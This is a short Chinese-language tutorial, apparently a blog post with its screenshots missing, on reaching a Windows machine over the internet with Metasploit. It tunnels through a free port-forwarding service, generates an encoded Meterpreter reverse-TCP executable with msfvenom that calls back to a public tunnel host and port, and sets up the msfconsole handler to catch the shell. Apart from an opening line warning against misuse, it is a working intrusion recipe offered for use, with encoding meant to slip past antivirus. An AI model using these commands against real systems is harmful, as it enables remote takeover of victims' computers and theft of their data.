切记!不要去干坏事!
首先我们需要一个内网穿透的工具,我这里用的是飞鸽,注册登录之后选择开通隧道,然后随便选个节点,然后点免费使用
然后我们选择tcp协议,端口号可以随便提填,ip去虚拟机里找
然后把ip填进去
我这里之前创建了一个,不能再创建免费节点,所以就直接放创建好的图了
然后我们下载客户端,把他放进kali linux里,安装方法飞鸽教程里有写,我就直接拿过来了。
运行成功的效果应该是这个样子
紧接着就是熟悉的生成指令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=freehk.svipss.top lport=20422 -f exe > shell.exe
lhost为访问地址冒号前的部分
lport为访问地址冒号后的部分
相当于一个是ip,一个是端口号
生成成功,紧接着我们打开msf工具,我比较懒,就直接搜索了
然后寻找这段关键字,这里可能你的序号跟我不一样,自己找一下啦
现在我们使用关键字use,use 30,然后开始设置模块
set payload windows/meterpreter/reverse_tcp
设置一下lhost和lport,这里的两个值就填我们飞鸽里面写的信息
弄好之后直接run,然后等电脑访问
如果成功的话,就会出现下面一样的提示
截图看一下
没问题了